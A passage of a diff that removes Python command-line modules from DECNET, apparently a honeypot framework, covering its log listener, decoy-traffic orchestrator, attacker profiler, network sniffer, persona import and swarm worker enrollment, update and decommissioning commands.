log.info("listener command invoked host=%s port=%d", bind_host, bind_port)
|
||||
console.print(f"[green]Starting DECNET log listener on {bind_host}:{bind_port} (mTLS)...[/]")
|
||||
|
||||
async def _main() -> None:
|
||||
stop = asyncio.Event()
|
||||
loop = asyncio.get_running_loop()
|
||||
for sig in (signal.SIGTERM, signal.SIGINT):
|
||||
try:
|
||||
loop.add_signal_handler(sig, stop.set)
|
||||
except (NotImplementedError, RuntimeError): # pragma: no cover
|
||||
pass
|
||||
await run_listener(cfg, stop_event=stop)
|
||||
|
||||
try:
|
||||
asyncio.run(_main())
|
||||
except KeyboardInterrupt:
|
||||
pass
|
||||
@@ -1,55 +0,0 @@
|
||||
from __future__ import annotations
|
||||
|
||||
from typing import Optional
|
||||
|
||||
import typer
|
||||
|
||||
from . import utils as _utils
|
||||
from .utils import console, log
|
||||
|
||||
|
||||
def register(app: typer.Typer) -> None:
|
||||
@app.command(name="orchestrate")
|
||||
def orchestrate_cmd(
|
||||
interval: int = typer.Option(
|
||||
60, "--interval", "-i",
|
||||
help="Seconds between synthetic activity ticks",
|
||||
),
|
||||
daemon: bool = typer.Option(
|
||||
False, "--daemon", "-d",
|
||||
help="Detach to background as a daemon process",
|
||||
),
|
||||
llm: Optional[bool] = typer.Option(
|
||||
None, "--llm/--no-llm",
|
||||
help=(
|
||||
"Enable / disable LLM enrichment of user-class file "
|
||||
"bodies. Default reads $DECNET_REALISM_LLM (any "
|
||||
"non-empty value enables; 'off' / unset disables)."
|
||||
),
|
||||
),
|
||||
) -> None:
|
||||
"""Inject synthetic life (inter-decky traffic + file ops + email) into the fleet."""
|
||||
import asyncio
|
||||
from decnet.orchestrator import orchestrator_worker
|
||||
from decnet.web.dependencies import repo
|
||||
|
||||
if daemon:
|
||||
log.info("orchestrator daemonizing interval=%d", interval)
|
||||
_utils._daemonize()
|
||||
|
||||
log.info(
|
||||
"orchestrator starting interval=%d llm=%s",
|
||||
interval, "default" if llm is None else ("on" if llm else "off"),
|
||||
)
|
||||
console.print(
|
||||
f"[bold cyan]Orchestrator starting[/] (interval: {interval}s)"
|
||||
)
|
||||
|
||||
async def _run() -> None:
|
||||
await repo.initialize()
|
||||
await orchestrator_worker(repo, interval=interval, llm_enabled=llm)
|
||||
|
||||
try:
|
||||
asyncio.run(_run())
|
||||
except KeyboardInterrupt:
|
||||
console.print("\n[yellow]Orchestrator stopped.[/]")
|
||||
@@ -1,34 +0,0 @@
|
||||
from __future__ import annotations
|
||||
|
||||
import typer
|
||||
|
||||
from . import utils as _utils
|
||||
from .utils import console, log
|
||||
|
||||
|
||||
def register(app: typer.Typer) -> None:
|
||||
@app.command(name="profiler")
|
||||
def profiler_cmd(
|
||||
interval: int = typer.Option(30, "--interval", "-i", help="Seconds between profile rebuild cycles"),
|
||||
daemon: bool = typer.Option(False, "--daemon", "-d", help="Detach to background as a daemon process"),
|
||||
) -> None:
|
||||
"""Run the attacker profiler as a standalone microservice."""
|
||||
import asyncio
|
||||
from decnet.profiler import attacker_profile_worker
|
||||
from decnet.web.dependencies import repo
|
||||
|
||||
if daemon:
|
||||
log.info("profiler daemonizing interval=%d", interval)
|
||||
_utils._daemonize()
|
||||
|
||||
log.info("profiler starting interval=%d", interval)
|
||||
console.print(f"[bold cyan]Profiler starting[/] (interval: {interval}s)")
|
||||
|
||||
async def _run() -> None:
|
||||
await repo.initialize()
|
||||
await attacker_profile_worker(repo, interval=interval)
|
||||
|
||||
try:
|
||||
asyncio.run(_run())
|
||||
except KeyboardInterrupt:
|
||||
console.print("\n[yellow]Profiler stopped.[/]")
|
||||
@@ -1,111 +0,0 @@
|
||||
"""``decnet realism ...`` — content-engine maintenance commands.
|
||||
|
||||
After stage 5 of the realism migration, this is the only remaining
|
||||
CLI surface from the realism library / former emailgen. ``decnet
|
||||
realism run`` does not exist (the orchestrator runs the unified
|
||||
worker via ``decnet orchestrate``); the only sub-command is
|
||||
``import-personas``, which validates + installs the host-wide global
|
||||
persona pool consumed by fleet (MACVLAN/IPVLAN) and SWARM-shard
|
||||
deckies.
|
||||
|
||||
Topology personas live on ``Topology.email_personas`` and are
|
||||
managed via the dashboard or the topology API; this command does
|
||||
not touch them.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import json
|
||||
from pathlib import Path
|
||||
from typing import Optional
|
||||
|
||||
import typer
|
||||
|
||||
from .gating import _require_master_mode
|
||||
from .utils import console, log
|
||||
|
||||
|
||||
def register(app: typer.Typer) -> None:
|
||||
realism_app = typer.Typer(
|
||||
name="realism",
|
||||
help=(
|
||||
"Maintain the realism content engine (persona pool import, "
|
||||
"future content-class tuning)."
|
||||
),
|
||||
)
|
||||
app.add_typer(realism_app, name="realism")
|
||||
|
||||
@realism_app.command("import-personas")
|
||||
def realism_import_personas(
|
||||
path: Path = typer.Argument(
|
||||
..., exists=True, file_okay=True, dir_okay=False, readable=True,
|
||||
help="JSON file containing a list of EmailPersona objects",
|
||||
),
|
||||
output: Optional[Path] = typer.Option(
|
||||
None, "--output", "-o",
|
||||
help=(
|
||||
"Override the destination path. Defaults to the canonical "
|
||||
"global pool (DECNET_REALISM_PERSONAS, /etc/decnet/"
|
||||
"email_personas.json, or ~/.decnet/email_personas.json)."
|
||||
),
|
||||
),
|
||||
) -> None:
|
||||
"""Validate + install a personas JSON file as the global pool.
|
||||
|
||||
Use this when deploying with IMAP/POP3 services on fleet
|
||||
(MACVLAN/IPVLAN) or SWARM-shard mail deckies — those have no
|
||||
parent topology row, so they read this host-wide list.
|
||||
MazeNET topology mail deckies use ``Topology.email_personas``
|
||||
instead and this command does not touch them.
|
||||
"""
|
||||
_require_master_mode("realism import-personas")
|
||||
from decnet.realism import personas_pool as global_pool
|
||||
from decnet.realism.personas import parse_personas
|
||||
|
||||
try:
|
||||
raw = path.read_text(encoding="utf-8")
|
||||
except OSError as exc:
|
||||
console.print(f"[red]Cannot read {path}:[/] {exc}")
|
||||
raise typer.Exit(code=1) from exc
|
||||
|
||||
try:
|
||||
payload = json.loads(raw)
|
||||
except json.JSONDecodeError as exc:
|
||||
console.print(f"[red]Invalid JSON in {path}:[/] {exc}")
|
||||
raise typer.Exit(code=1) from exc
|
||||
if not isinstance(payload, list):
|
||||
console.print(
|
||||
f"[red]{path} must contain a JSON list of personas, "
|
||||
f"got {type(payload).__name__}[/]"
|
||||
)
|
||||
raise typer.Exit(code=1)
|
||||
|
||||
personas = parse_personas(payload)
|
||||
if not personas:
|
||||
console.print(
|
||||
f"[red]No valid personas in {path}.[/] "
|
||||
"Check the schema (name, email, role, tone, mannerisms)."
|
||||
)
|
||||
raise typer.Exit(code=1)
|
||||
if len(personas) < 2:
|
||||
console.print(
|
||||
f"[yellow]Warning: only {len(personas)} valid persona(s) — "
|
||||
"the worker requires at least 2 to send mail; importing "
|
||||
"anyway in case more are added later.[/]"
|
||||
)
|
||||
|
||||
dest = output or global_pool.resolve_path()
|
||||
dest.parent.mkdir(parents=True, exist_ok=True)
|
||||
dest.write_text(
|
||||
json.dumps(
|
||||
[p.model_dump(exclude_none=False) for p in personas],
|
||||
indent=2,
|
||||
ensure_ascii=False,
|
||||
),
|
||||
encoding="utf-8",
|
||||
)
|
||||
global_pool.reset_cache()
|
||||
console.print(
|
||||
f"[green]Imported {len(personas)} personas to[/] {dest}"
|
||||
)
|
||||
if path != dest:
|
||||
log.info("realism import-personas src=%s dest=%s", path, dest)
|
||||
@@ -1,62 +0,0 @@
|
||||
from __future__ import annotations
|
||||
|
||||
import typer
|
||||
|
||||
from . import utils as _utils
|
||||
from .utils import console, log
|
||||
|
||||
|
||||
def register(app: typer.Typer) -> None:
|
||||
@app.command(name="reconcile")
|
||||
def reconcile_cmd(
|
||||
once: bool = typer.Option(
|
||||
False, "--once",
|
||||
help="Run a single reconcile pass and exit (no daemon loop).",
|
||||
),
|
||||
interval: int = typer.Option(
|
||||
30, "--interval", "-i",
|
||||
help="Seconds between reconcile passes (ignored with --once).",
|
||||
),
|
||||
daemon: bool = typer.Option(
|
||||
False, "--daemon", "-d",
|
||||
help="Detach to background as a daemon process (long-lived only).",
|
||||
),
|
||||
) -> None:
|
||||
"""Converge fleet state across decnet-state.json, the DB, and docker."""
|
||||
import asyncio
|
||||
from decnet.web.dependencies import repo
|
||||
|
||||
if once:
|
||||
from decnet.fleet.reconciler import reconcile_once
|
||||
|
||||
async def _one() -> None:
|
||||
await repo.initialize()
|
||||
counts = await reconcile_once(repo)
|
||||
console.print(
|
||||
f"[bold cyan]reconcile:[/] "
|
||||
f"inserted={counts['inserted']} "
|
||||
f"deleted={counts['deleted']} "
|
||||
f"state_updated={counts['state_updated']}"
|
||||
)
|
||||
asyncio.run(_one())
|
||||
return
|
||||
|
||||
from decnet.fleet.reconciler_worker import fleet_reconciler_worker
|
||||
|
||||
if daemon:
|
||||
log.info("reconciler daemonizing interval=%d", interval)
|
||||
_utils._daemonize()
|
||||
|
||||
log.info("reconciler starting interval=%d", interval)
|
||||
console.print(
|
||||
f"[bold cyan]Fleet reconciler starting[/] (interval: {interval}s)"
|
||||
)
|
||||
|
||||
async def _run() -> None:
|
||||
await repo.initialize()
|
||||
await fleet_reconciler_worker(repo, interval=interval)
|
||||
|
||||
try:
|
||||
asyncio.run(_run())
|
||||
except KeyboardInterrupt:
|
||||
console.print("\n[yellow]Reconciler stopped.[/]")
|
||||
@@ -1,31 +0,0 @@
|
||||
from __future__ import annotations
|
||||
|
||||
import typer
|
||||
|
||||
from decnet.env import DECNET_INGEST_LOG_FILE
|
||||
|
||||
from . import utils as _utils
|
||||
from .utils import console, log
|
||||
|
||||
|
||||
def register(app: typer.Typer) -> None:
|
||||
@app.command(name="sniffer")
|
||||
def sniffer_cmd(
|
||||
log_file: str = typer.Option(DECNET_INGEST_LOG_FILE, "--log-file", "-f", help="Path to write captured syslog + JSON records"),
|
||||
daemon: bool = typer.Option(False, "--daemon", "-d", help="Detach to background as a daemon process"),
|
||||
) -> None:
|
||||
"""Run the network sniffer as a standalone microservice."""
|
||||
import asyncio
|
||||
from decnet.sniffer import sniffer_worker
|
||||
|
||||
if daemon:
|
||||
log.info("sniffer daemonizing log_file=%s", log_file)
|
||||
_utils._daemonize()
|
||||
|
||||
log.info("sniffer starting log_file=%s", log_file)
|
||||
console.print(f"[bold cyan]Sniffer starting[/] → {log_file}")
|
||||
|
||||
try:
|
||||
asyncio.run(sniffer_worker(log_file))
|
||||
except KeyboardInterrupt:
|
||||
console.print("\n[yellow]Sniffer stopped.[/]")
|
||||
@@ -1,346 +0,0 @@
|
||||
"""`decnet swarm ...` — master-side operator commands (HTTP to local swarmctl)."""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
from typing import Optional
|
||||
|
||||
import typer
|
||||
from rich.table import Table
|
||||
|
||||
from . import utils as _utils
|
||||
from .utils import console
|
||||
|
||||
|
||||
def register(app: typer.Typer) -> None:
|
||||
swarm_app = typer.Typer(
|
||||
name="swarm",
|
||||
help="Manage swarm workers (enroll, list, decommission). Requires `decnet swarmctl` running.",
|
||||
no_args_is_help=True,
|
||||
)
|
||||
app.add_typer(swarm_app, name="swarm")
|
||||
|
||||
@swarm_app.command("enroll")
|
||||
def swarm_enroll(
|
||||
name: str = typer.Option(..., "--name", help="Short hostname for the worker (also the cert CN)"),
|
||||
address: str = typer.Option(..., "--address", help="IP or DNS the master uses to reach the worker"),
|
||||
agent_port: int = typer.Option(8765, "--agent-port", help="Worker agent TCP port"),
|
||||
sans: Optional[str] = typer.Option(None, "--sans", help="Comma-separated extra SANs for the worker cert"),
|
||||
notes: Optional[str] = typer.Option(None, "--notes", help="Free-form operator notes"),
|
||||
out_dir: Optional[str] = typer.Option(None, "--out-dir", help="Write the bundle (ca.crt/worker.crt/worker.key) to this dir for scp"),
|
||||
updater: bool = typer.Option(False, "--updater", help="Also issue an updater-identity cert (CN=updater@<name>) for the remote self-updater"),
|
||||
url: Optional[str] = typer.Option(None, "--url", help="Override swarm controller URL (default: 127.0.0.1:8770)"),
|
||||
) -> None:
|
||||
"""Issue a mTLS bundle for a new worker and register it in the swarm."""
|
||||
import pathlib as _pathlib
|
||||
|
||||
body: dict = {"name": name, "address": address, "agent_port": agent_port}
|
||||
if sans:
|
||||
body["sans"] = [s.strip() for s in sans.split(",") if s.strip()]
|
||||
if notes:
|
||||
body["notes"] = notes
|
||||
if updater:
|
||||
body["issue_updater_bundle"] = True
|
||||
|
||||
resp = _utils._http_request("POST", _utils._swarmctl_base_url(url) + "/swarm/enroll", json_body=body)
|
||||
data = resp.json()
|
||||
|
||||
console.print(f"[green]Enrolled worker:[/] {data['name']} "
|
||||
f"[dim]uuid=[/]{data['host_uuid']} "
|
||||
f"[dim]fingerprint=[/]{data['fingerprint']}")
|
||||
if data.get("updater"):
|
||||
console.print(f"[green] + updater identity[/] "
|
||||
f"[dim]fingerprint=[/]{data['updater']['fingerprint']}")
|
||||
|
||||
if out_dir:
|
||||
target = _pathlib.Path(out_dir).expanduser()
|
||||
target.mkdir(parents=True, exist_ok=True)
|
||||
(target / "ca.crt").write_text(data["ca_cert_pem"])
|
||||
(target / "worker.crt").write_text(data["worker_cert_pem"])
|
||||
(target / "worker.key").write_text(data["worker_key_pem"])
|
||||
for leaf in ("worker.key",):
|
||||
try:
|
||||
(target / leaf).chmod(0o600)
|
||||
except OSError:
|
||||
pass
|
||||
console.print(f"[cyan]Agent bundle written to[/] {target}")
|
||||
|
||||
if data.get("updater"):
|
||||
upd_target = target.parent / f"{target.name}-updater"
|
||||
upd_target.mkdir(parents=True, exist_ok=True)
|
||||
(upd_target / "ca.crt").write_text(data["ca_cert_pem"])
|
||||
(upd_target / "updater.crt").write_text(data["updater"]["updater_cert_pem"])
|
||||
(upd_target / "updater.key").write_text(data["updater"]["updater_key_pem"])
|
||||
try:
|
||||
(upd_target / "updater.key").chmod(0o600)
|
||||
except OSError:
|
||||
pass
|
||||
console.print(f"[cyan]Updater bundle written to[/] {upd_target}")
|
||||
console.print("[dim]Ship the agent dir to ~/.decnet/agent/ and the updater dir to ~/.decnet/updater/ on the worker.[/]")
|
||||
else:
|
||||
console.print("[dim]Ship this directory to the worker at ~/.decnet/agent/ (or wherever `decnet agent --agent-dir` points).[/]")
|
||||
else:
|
||||
console.print("[yellow]No --out-dir given — bundle PEMs are in the JSON response; persist them before leaving this shell.[/]")
|
||||
|
||||
@swarm_app.command("list")
|
||||
def swarm_list(
|
||||
host_status: Optional[str] = typer.Option(None, "--status", help="Filter by status (enrolled|active|unreachable|decommissioned)"),
|
||||
url: Optional[str] = typer.Option(None, "--url", help="Override swarm controller URL"),
|
||||
) -> None:
|
||||
"""List enrolled workers."""
|
||||
q = f"?host_status={host_status}" if host_status else ""
|
||||
resp = _utils._http_request("GET", _utils._swarmctl_base_url(url) + "/swarm/hosts" + q)
|
||||
rows = resp.json()
|
||||
if not rows:
|
||||
console.print("[dim]No workers enrolled.[/]")
|
||||
return
|
||||
table = Table(title="DECNET swarm workers")
|
||||
for col in ("name", "address", "port", "status", "last heartbeat", "enrolled"):
|
||||
table.add_column(col)
|
||||
for r in rows:
|
||||
table.add_row(
|
||||
r.get("name") or "",
|
||||
r.get("address") or "",
|
||||
str(r.get("agent_port") or ""),
|
||||
r.get("status") or "",
|
||||
str(r.get("last_heartbeat") or "—"),
|
||||
str(r.get("enrolled_at") or "—"),
|
||||
)
|
||||
console.print(table)
|
||||
|
||||
@swarm_app.command("check")
|
||||
def swarm_check(
|
||||
url: Optional[str] = typer.Option(None, "--url", help="Override swarm controller URL"),
|
||||
json_out: bool = typer.Option(False, "--json", help="Emit JSON instead of a table"),
|
||||
) -> None:
|
||||
"""Actively probe every enrolled worker and refresh status + last_heartbeat."""
|
||||
resp = _utils._http_request("POST", _utils._swarmctl_base_url(url) + "/swarm/check", timeout=60.0)
|
||||
payload = resp.json()
|
||||
results = payload.get("results", [])
|
||||
|
||||
if json_out:
|
||||
console.print_json(data=payload)
|
||||
return
|
||||
|
||||
if not results:
|
||||
console.print("[dim]No workers enrolled.[/]")
|
||||
return
|
||||
|
||||
table = Table(title="DECNET swarm check")
|
||||
for col in ("name", "address", "reachable", "detail"):
|
||||
table.add_column(col)
|
||||
for r in results:
|
||||
reachable = r.get("reachable")
|
||||
mark = "[green]yes[/]" if reachable else "[red]no[/]"
|
||||
detail = r.get("detail")
|
||||
detail_str = "—"
|
||||
if isinstance(detail, dict):
|
||||
detail_str = detail.get("status") or ", ".join(f"{k}={v}" for k, v in detail.items())
|
||||
elif detail is not None:
|
||||
detail_str = str(detail)
|
||||
table.add_row(
|
||||
r.get("name") or "",
|
||||
r.get("address") or "",
|
||||
mark,
|
||||
detail_str,
|
||||
)
|
||||
console.print(table)
|
||||
|
||||
@swarm_app.command("update")
|
||||
def swarm_update(
|
||||
host: Optional[str] = typer.Option(None, "--host", help="Target worker (name or UUID). Omit with --all."),
|
||||
all_hosts: bool = typer.Option(False, "--all", help="Push to every enrolled worker."),
|
||||
include_self: bool = typer.Option(False, "--include-self", help="Also push to each updater's /update-self after a successful agent update."),
|
||||
root: Optional[str] = typer.Option(None, "--root", help="Source tree to tar (default: CWD)."),
|
||||
exclude: list[str] = typer.Option([], "--exclude", help="Additional exclude glob. Repeatable."),
|
||||
updater_port: int = typer.Option(8766, "--updater-port", help="Port the workers' updater listens on."),
|
||||
dry_run: bool = typer.Option(False, "--dry-run", help="Build the tarball and print stats; no network."),
|
||||
url: Optional[str] = typer.Option(None, "--url", help="Override swarm controller URL."),
|
||||
) -> None:
|
||||
"""Push the current working tree to workers' self-updaters (with auto-rollback on failure)."""
|
||||
import asyncio
|
||||
import pathlib as _pathlib
|
||||
|
||||
from decnet.swarm.tar_tree import tar_working_tree, detect_git_sha
|
||||
from decnet.swarm.updater_client import UpdaterClient
|
||||
|
||||
if not (host or all_hosts):
|
||||
console.print("[red]Supply --host <name> or --all.[/]")
|
||||
raise typer.Exit(2)
|
||||
if host and all_hosts:
|
||||
console.print("[red]--host and --all are mutually exclusive.[/]")
|
||||
raise typer.Exit(2)
|
||||
|
||||
base = _utils._swarmctl_base_url(url)
|
||||
resp = _utils._http_request("GET", base + "/swarm/hosts")
|
||||
rows = resp.json()
|
||||
if host:
|
||||
targets = [r for r in rows if r.get("name") == host or r.get("uuid") == host]
|
||||
if not targets:
|
||||
console.print(f"[red]No enrolled worker matching '{host}'.[/]")
|
||||
raise typer.Exit(1)
|
||||
else:
|
||||
targets = [r for r in rows if r.get("status") != "decommissioned"]
|
||||
if not targets:
|
||||
console.print("[dim]No targets.[/]")
|
||||
return
|
||||
|
||||
tree_root = _pathlib.Path(root) if root else _pathlib.Path.cwd()
|
||||
sha = detect_git_sha(tree_root)
|
||||
console.print(f"[dim]Tarring[/] {tree_root} [dim]sha={sha or '(not a git repo)'}[/]")
|
||||
tarball = tar_working_tree(tree_root, extra_excludes=exclude)
|
||||
console.print(f"[dim]Tarball size:[/] {len(tarball):,} bytes")
|
||||
|
||||
if dry_run:
|
||||
console.print("[yellow]--dry-run: not pushing.[/]")
|
||||
for t in targets:
|
||||
console.print(f" would push to [cyan]{t.get('name')}[/] at {t.get('address')}:{updater_port}")
|
||||
return
|
||||
|
||||
async def _push_one(h: dict) -> dict:
|
||||
name = h.get("name") or h.get("uuid")
|
||||
out: dict = {"name": name, "address": h.get("address"), "agent": None, "self": None}
|
||||
try:
|
||||
async with UpdaterClient(h, updater_port=updater_port) as u:
|
||||
r = await u.update(tarball, sha=sha)
|
||||
out["agent"] = {"status": r.status_code, "body": r.json() if r.content else {}}
|
||||
if r.status_code == 200 and include_self:
|
||||
rs = await u.update_self(tarball, sha=sha)
|
||||
out["self"] = {"status": rs.status_code, "body": rs.json() if rs.content else {}}
|
||||
except Exception as exc: # noqa: BLE001
|
||||
out["error"] = f"{type(exc).__name__}: {exc}"
|
||||
return out
|
||||
|
||||
async def _push_all() -> list[dict]:
|
||||
return await asyncio.gather(*(_push_one(t) for t in targets))
|
||||
|
||||
results = asyncio.run(_push_all())
|
||||
|
||||
table = Table(title="DECNET swarm update")
|
||||
for col in ("host", "address", "agent", "self", "detail"):
|
||||
table.add_column(col)
|
||||
any_failure = False
|
||||
for r in results:
|
||||
agent = r.get("agent") or {}
|
||||
selff = r.get("self") or {}
|
||||
err = r.get("error")
|
||||
if err:
|
||||
any_failure = True
|
||||
table.add_row(r["name"], r.get("address") or "", "[red]error[/]", "—", err)
|
||||
continue
|
||||
a_status = agent.get("status")
|
||||
if a_status == 200:
|
||||
agent_cell = "[green]updated[/]"
|
||||
elif a_status == 409:
|
||||
agent_cell = "[yellow]rolled-back[/]"
|
||||
any_failure = True
|
||||
else:
|
||||
agent_cell = f"[red]{a_status}[/]"
|
||||
any_failure = True
|
||||
if not include_self:
|
||||
self_cell = "—"
|
||||
elif selff.get("status") == 200 or selff.get("status") is None:
|
||||
self_cell = "[green]ok[/]" if selff else "[dim]skipped[/]"
|
||||
else:
|
||||
self_cell = f"[red]{selff.get('status')}[/]"
|
||||
detail = ""
|
||||
body = agent.get("body") or {}
|
||||
if isinstance(body, dict):
|
||||
detail = body.get("release", {}).get("sha") or body.get("detail", {}).get("error") or ""
|
||||
table.add_row(r["name"], r.get("address") or "", agent_cell, self_cell, str(detail)[:80])
|
||||
console.print(table)
|
||||
|
||||
if any_failure:
|
||||
raise typer.Exit(1)
|
||||
|
||||
@swarm_app.command("deckies")
|
||||
def swarm_deckies(
|
||||
host: Optional[str] = typer.Option(None, "--host", help="Filter by worker name or UUID"),
|
||||
state: Optional[str] = typer.Option(None, "--state", help="Filter by shard state (pending|running|failed|torn_down)"),
|
||||
url: Optional[str] = typer.Option(None, "--url", help="Override swarm controller URL"),
|
||||
json_out: bool = typer.Option(False, "--json", help="Emit JSON instead of a table"),
|
||||
) -> None:
|
||||
"""List deployed deckies across the swarm with their owning worker host."""
|
||||
base = _utils._swarmctl_base_url(url)
|
||||
|
||||
host_uuid: Optional[str] = None
|
||||
if host:
|
||||
resp = _utils._http_request("GET", base + "/swarm/hosts")
|
||||
rows = resp.json()
|
||||
match = next((r for r in rows if r.get("uuid") == host or r.get("name") == host), None)
|
||||
if match is None:
|
||||
console.print(f"[red]No enrolled worker matching '{host}'.[/]")
|
||||
raise typer.Exit(1)
|
||||
host_uuid = match["uuid"]
|
||||
|
||||
query = []
|
||||
if host_uuid:
|
||||
query.append(f"host_uuid={host_uuid}")
|
||||
if state:
|
||||
query.append(f"state={state}")
|
||||
path = "/swarm/deckies" + ("?" + "&".join(query) if query else "")
|
||||
|
||||
resp = _utils._http_request("GET", base + path)
|
||||
rows = resp.json()
|
||||
|
||||
if json_out:
|
||||
console.print_json(data=rows)
|
||||
return
|
||||
|
||||
if not rows:
|
||||
console.print("[dim]No deckies deployed.[/]")
|
||||
return
|
||||
|
||||
table = Table(title="DECNET swarm deckies")
|
||||
for col in ("decky", "host", "address", "state", "services"):
|
||||
table.add_column(col)
|
||||
for r in rows:
|
||||
services = ",".join(r.get("services") or []) or "—"
|
||||
state_val = r.get("state") or "pending"
|
||||
colored = {
|
||||
"running": f"[green]{state_val}[/]",
|
||||
"failed": f"[red]{state_val}[/]",
|
||||
"pending": f"[yellow]{state_val}[/]",
|
||||
"torn_down": f"[dim]{state_val}[/]",
|
||||
}.get(state_val, state_val)
|
||||
table.add_row(
|
||||
r.get("decky_name") or "",
|
||||
r.get("host_name") or "<unknown>",
|
||||
r.get("host_address") or "",
|
||||
colored,
|
||||
services,
|
||||
)
|
||||
console.print(table)
|
||||
|
||||
@swarm_app.command("decommission")
|
||||
def swarm_decommission(
|
||||
name: Optional[str] = typer.Option(None, "--name", help="Worker hostname"),
|
||||
uuid: Optional[str] = typer.Option(None, "--uuid", help="Worker UUID (skip lookup)"),
|
||||
url: Optional[str] = typer.Option(None, "--url", help="Override swarm controller URL"),
|
||||
yes: bool = typer.Option(False, "--yes", "-y", help="Skip interactive confirmation"),
|
||||
) -> None:
|
||||
"""Remove a worker from the swarm (cascades decky shard rows)."""
|
||||
if not (name or uuid):
|
||||
console.print("[red]Supply --name or --uuid.[/]")
|
||||
raise typer.Exit(2)
|
||||
|
||||
base = _utils._swarmctl_base_url(url)
|
||||
target_uuid = uuid
|
||||
target_name = name
|
||||
if target_uuid is None:
|
||||
resp = _utils._http_request("GET", base + "/swarm/hosts")
|
||||
rows = resp.json()
|
||||
match = next((r for r in rows if r.get("name") == name), None)
|
||||
if match is None:
|
||||
console.print(f"[red]No enrolled worker named '{name}'.[/]")
|
||||
raise typer.Exit(1)
|
||||
target_uuid = match["uuid"]
|
||||
target_name = match.get("name") or target_name
|
||||
|
||||
if not yes:
|
||||
confirm = typer.confirm(f"Decommission worker {target_name!r} ({target_uuid})?", default=False)
|
||||
if not confirm:
|
||||
console.print("[dim]Aborted.[/]")
|
||||
raise typer.Exit(0)
|
||||
|
||||
_utils._http_request("DELETE", f"{base}/swarm/hosts/{target_uuid}")
|
||||
console.print(f"[green]Decommissioned {target_name or target_uuid}.[/]")
|
||||
@@ -1,104 +0,0 @@
|
||||
from __future__ import annotations
|
||||
|
||||
import os
|
||||
import signal
|
||||
import subprocess # nosec B404
|
||||
import sys
|
||||
from typing import Optional
|
||||
|
||||
import typer
|
||||
|
||||
from . import utils as _utils
|
||||
from .gating import _require_master_mode
|
||||
from .utils import console, log
|
||||
|
||||
|
||||
def register(app: typer.Typer) -> None:
|
||||
@app.command()
|
||||
def swarmctl(
|
||||
port: int = typer.Option(8770, "--port", help="Port for the swarm controller"),
|
||||
host: str = typer.Option("127.0.0.1", "--host", help="Bind address for the swarm controller"),
|
||||
daemon: bool = typer.Option(False, "--daemon", "-d", help="Detach to background as a daemon process"),
|
||||
no_listener: bool = typer.Option(False, "--no-listener", help="Do not auto-spawn the syslog-TLS listener alongside swarmctl"),
|
||||
tls: bool = typer.Option(False, "--tls", help="Serve over HTTPS with mTLS (required for cross-host worker heartbeats)"),
|
||||
cert: Optional[str] = typer.Option(None, "--cert", help="BYOC: path to TLS server cert (PEM). Auto-issues from the DECNET CA if omitted."),
|
||||
key: Optional[str] = typer.Option(None, "--key", help="BYOC: path to TLS server private key (PEM)."),
|
||||
client_ca: Optional[str] = typer.Option(None, "--client-ca", help="CA bundle used to verify worker client certs. Defaults to the DECNET CA."),
|
||||
) -> None:
|
||||
"""Run the DECNET SWARM controller (master-side, separate process from `decnet api`).
|
||||
|
||||
By default, `decnet swarmctl` auto-spawns `decnet listener` as a fully-
|
||||
detached sibling process so the master starts accepting forwarder
|
||||
connections on 6514 without a second manual invocation. The listener
|
||||
survives swarmctl restarts and crashes — if it dies on its own,
|
||||
restart it manually with `decnet listener --daemon …`. Pass
|
||||
--no-listener to skip.
|
||||
|
||||
Pass ``--tls`` to serve over HTTPS with mutual-TLS enforcement. By
|
||||
default the server cert is auto-issued from the DECNET CA under
|
||||
``~/.decnet/swarmctl/`` so enrolled workers (which already ship that
|
||||
CA's ``ca.crt``) trust it out of the box. BYOC via ``--cert``/``--key``
|
||||
if you need a publicly-trusted or externally-managed cert.
|
||||
"""
|
||||
_require_master_mode("swarmctl")
|
||||
if daemon:
|
||||
log.info("swarmctl daemonizing host=%s port=%d", host, port)
|
||||
_utils._daemonize()
|
||||
|
||||
if not no_listener:
|
||||
listener_host = os.environ.get("DECNET_LISTENER_HOST", "0.0.0.0") # nosec B104
|
||||
listener_port = int(os.environ.get("DECNET_SWARM_SYSLOG_PORT", "6514"))
|
||||
lst_argv = [
|
||||
sys.executable, "-m", "decnet", "listener",
|
||||
"--host", listener_host,
|
||||
"--port", str(listener_port),
|
||||
"--daemon",
|
||||
]
|
||||
try:
|
||||
pid = _utils._spawn_detached(lst_argv, _utils._pid_dir() / "listener.pid")
|
||||
log.info("swarmctl auto-spawned listener pid=%d bind=%s:%d",
|
||||
pid, listener_host, listener_port)
|
||||
console.print(f"[dim]Auto-spawned listener (pid {pid}) on {listener_host}:{listener_port}.[/]")
|
||||
except Exception as e: # noqa: BLE001
|
||||
log.warning("swarmctl could not auto-spawn listener: %s", e)
|
||||
console.print(f"[yellow]listener auto-spawn skipped: {e}[/]")
|
||||
|
||||
log.info("swarmctl command invoked host=%s port=%d tls=%s", host, port, tls)
|
||||
scheme = "https" if tls else "http"
|
||||
console.print(f"[green]Starting DECNET SWARM controller on {scheme}://{host}:{port}...[/]")
|
||||
_cmd = [sys.executable, "-m", "uvicorn", "decnet.web.swarm_api:app",
|
||||
"--host", host, "--port", str(port)]
|
||||
if tls:
|
||||
from decnet.swarm import pki as _pki
|
||||
if cert and key:
|
||||
cert_path, key_path = cert, key
|
||||
elif cert or key:
|
||||
console.print("[red]--cert and --key must be provided together.[/]")
|
||||
raise typer.Exit(code=2)
|
||||
else:
|
||||
auto_cert, auto_key, _auto_ca = _pki.ensure_swarmctl_cert(host)
|
||||
cert_path, key_path = str(auto_cert), str(auto_key)
|
||||
console.print(f"[dim]Auto-issued swarmctl server cert → {cert_path}[/]")
|
||||
ca_path = client_ca or str(_pki.DEFAULT_CA_DIR / "ca.crt")
|
||||
_cmd += [
|
||||
"--ssl-keyfile", key_path,
|
||||
"--ssl-certfile", cert_path,
|
||||
"--ssl-ca-certs", ca_path,
|
||||
"--ssl-cert-reqs", "2",
|
||||
]
|
||||
try:
|
||||
proc = subprocess.Popen(_cmd, start_new_session=True) # nosec B603 B404
|
||||
try:
|
||||
proc.wait()
|
||||
except KeyboardInterrupt:
|
||||
try:
|
||||
os.killpg(proc.pid, signal.SIGTERM)
|
||||
try:
|
||||
proc.wait(timeout=10)
|
||||
except subprocess.TimeoutExpired:
|
||||
os.killpg(proc.pid, signal.SIGKILL)
|
||||
proc.wait()
|
||||
except ProcessLookupError:
|
||||
pass
|
||||
except (FileNotFoundError, subprocess.SubprocessError):
|
||||
